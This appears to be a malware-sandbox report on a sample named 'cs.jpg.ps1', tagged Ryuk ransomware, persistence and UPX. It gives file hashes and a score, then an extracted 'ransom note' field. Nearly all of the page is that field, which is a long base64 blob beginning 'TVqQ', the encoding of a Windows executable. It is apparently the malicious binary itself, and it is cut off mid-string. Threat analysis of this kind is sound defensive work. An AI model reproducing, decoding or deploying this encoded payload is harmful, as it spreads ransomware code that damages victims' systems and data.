Overview

overview

10

Static

static

cs.jpg.ps1

windows7_x64

10

cs.jpg.ps1

windows10_x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    cs.jpg

  • Size

    5KB

  • Sample

    210908-nmzycsedd7

  • MD5

    51a645c8ec38c1c387184971fb25d415

  • SHA1

    25454269f892c41c4402ad2a0f6a6550b6073710

  • SHA256

    3fd4cc4c6b673b37461086049a37d29fa05cd0b3773471ac087ea5eabdd57141

  • SHA512

    d819b5d5dff059406f223c27cdffbbaff2a11053ee1ab2dbc95d54dd9ee9ecfd7038209216506eeb765f9234ef56b792dc130ddd29402db4f24bea1add0be43f

Score
10/10
ryukpersistenceransomwareupx

Malware Config

Extracted

Path

C:\Users\Public\basemsf.txt

Family

ryuk

Ransom Note
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAAD8pNTAuMW6k7jFupO4xbqTO9m0k6zFupOO47CTgMW6k3vK55O9xbqTuMW7k+PFupOO47GTvcW6k7jFupO5xbqTUNqxk7rFupNQ2r6TucW6k1JpY2i4xbqTAAAAAAAAAABQRQAATAEFAMFnBmEAAAAAAAAAAOAADiELAQYAAJAAAADQYgAAAAAAeVgAAAAQAAAAoAAAAAAAEAAQAAAAEAAABAAAAAAAAAAEAAAAAAAAAADAbgAAEAAAAAAAAAIAAAAAABAAABAAAAAAEAAAEAAAAAAAABAAAABgrQAAQgAAAHSmAAA8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALBuAFwHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAoAAAOAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC50ZXh0AAAAhocAAAAQAAAAkAAAABAAAAAAAAAAAAAAAAAAACAAAGAucmRhdGEAAKINAAAAoAAAABAAAACgAAAAAAAAAAAAAAAAAABAAABALmRhdGEAAABAamIAALAAAABwYgAAsAAAAAAAAAAAAAAAAAAAQAAAwC52bXBzMAAAUIQLAAAgYwAAkAsAACBjAAAAAAAAAAAAAAAAAGAAAGAucmVsb2MAAFwHAAAAsG4AABAAAACwbgAAAAAAAAAAAAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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A4PDBGaJB4PHAosDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEZokHg8cCiwODwwRmiQeDxwJbg8MEU4sbiwODwwRmiQeDxwKLA4PDBIgHR4sDg8MEiAdHiwODwwSJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwRmiQeDxwKLA4PDBGaJB4PHAosDg8MEZokHg8cCiwODwwRmiQeDxwKLA4PDBGaJB4PHAosDg8MEZokHg8cCiwODwwSJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEZokHg8cCiwODwwRmiQeDxwKLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEiQeDxwRTuRAAAACLG4HDCAAAAFNRixuLA4PDBIkHg8cEiwODwwSJB4PHBFlbg8MESQ+F3P///1uDwwRbg8MEM8D/FQCgABCQkDllwHQXaIgBAABoExUCBGgGAAAA6MYoAACDxAxQi128U4t9uIsDg8MEiQeDxwRXiz9TZosDg8MCiQeDxwRmiwODwwKJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBGaLA4PDAokHg8cEZosDg8MCiQeDxwRbgcMUAAAAX4PHBFeLP1NmiwODwwKJB4PHBIoDQ4kHg8cEigNDiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEiQeDxwRmiwODwwKJB4PHBGaLA4PDAokHg8cEZosDg8MCiQeDxwRmiwODwwKJB4PHBGaLA4PDAokHg8cEZosDg8MCiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEZosDg8MCiQeDxwRmiwODwwKJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBFeLP7kQAAAAgccIAAAAU1dRiz+LA4PDBIkHg8cEiwODwwSJB4PHBFlfW4PHBIHDCAAAAEkPhdT///9fg8cEW4HD4AAAAF+DxwTo4SYAAIPEBFiJRbSJZbD/dbT/dcSLRfhQaPgAAADoySYAAIPEBIv4W1CJXaiJRayLA4PDBIkHg8cEU4sbiwODwwRmiQeDxwKLA4PDBGaJB4PHAosDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEZokHg8cCiwODwwRmiQeDxwJbg8MEU4sbiwODwwRmiQeDxwKLA4PDBIgHR4sDg8MEiAdHiwODwwSJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwRmiQeDxwKLA4PDBGaJB4PHAosDg8MEZokHg8cCiwODwwRmiQeDxwKLA4PDBGaJB4PHAosDg8MEZokHg8cCiwODwwSJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEZokHg8cCiwODwwRmiQeDxwKLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEiQeDxwRTuRAAAACLG4HDCAAAAFNRixuLA4PDBIkHg8cEiwODwwSJB4PHBFlbg8MESQ+F3P///1uDwwRbg8MEM8D/FQSgABCQkDllsHQXaIgBAABo